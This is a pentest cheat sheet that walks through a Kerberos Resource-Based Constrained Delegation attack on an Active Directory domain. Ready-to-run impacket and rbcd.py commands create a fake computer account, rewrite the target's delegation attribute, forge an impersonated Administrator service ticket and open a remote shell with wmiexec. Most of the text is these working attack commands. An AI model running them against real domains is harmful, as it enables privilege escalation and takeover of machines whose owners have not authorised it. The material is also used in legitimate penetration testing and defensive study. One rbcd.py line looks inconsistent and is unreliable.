Resource-Based Constrained Delegation Attack

Kerberos RBCD attack targets a domain computer, exactly service principals related to the target domain computer.

- [rbcd-attack](https://github.com/tothi/rbcd-attack)

Exploit

Reference: https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation

0. Prerequisites

To achieve this attack successfully, we need the following conditions:

• A domain account who has permission to write the computer (msDS-AllowedToActOnBehalfOfOtherIdentity property of the domain object).
• A domain account who has permission to create a new computer.
• LDAP (389) and SAMR (445) or LDAPS (636) access to the DC.
• Kerberos (88) access to the DC.

1. Create Fake Computer

impacket-addcomputer -computer-name 'fakecomputer$' -computer-pass 'password' -dc-ip 10.0.0.1 example.local/username:password

2. Modify Delegation Rights

We can use rbcd.py for abusing msDS-AllowedToActOnBehalfOfOtherIdentity property of the target.

rbcd.py -f FAKECOMPUTER -t WEB -dc-ip 10.0.0.1 example\\username:password

rbcd.py 'example.local/fakecomputer$' -delegate-to 'fakecomputer$' -delegate-from user1 -action write -use-ldaps -k -no-pass

3. Get the Impersonated Service Ticket

Impersonated service tickets may allow high-level access to services on the target like CIFS (Common Internet File System), HTTPs, etc.

getST.py -spn cifs/example.local -impersonate admin -dc-ip 10.0.0.1 example.local/FAKECOMPUTER$:password

4. Use the Service Ticket

After getting the service ticket, we can use it for further pentesting.
Before doing that, we need to add the environment variable as below:

export KRB5CCNAME=`pwd`/admin.ccache

# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klist

• Login to Services with Kerberos Auth

  # -k: Use Kerberos Auth
  # -no-pass: No password
  impacket-wmiexec example.local/Administrator@example.local -k -no-pass